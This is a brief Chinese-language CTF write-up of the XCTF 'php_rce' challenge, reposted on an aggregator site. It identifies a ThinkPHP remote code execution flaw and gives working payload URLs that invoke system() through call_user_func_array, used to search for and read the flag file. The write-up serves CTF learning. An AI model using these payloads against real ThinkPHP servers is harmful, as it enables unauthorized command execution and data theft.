題目：

看到題目就知道是thinkphp的遠程執行漏洞
payload：
index.php默認的話可以不需要

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代碼

注：代碼后面可不加分號
獲得flag：

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

總結

以上是生活随笔為你收集整理的XCTF-高手进阶区：php_rce的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。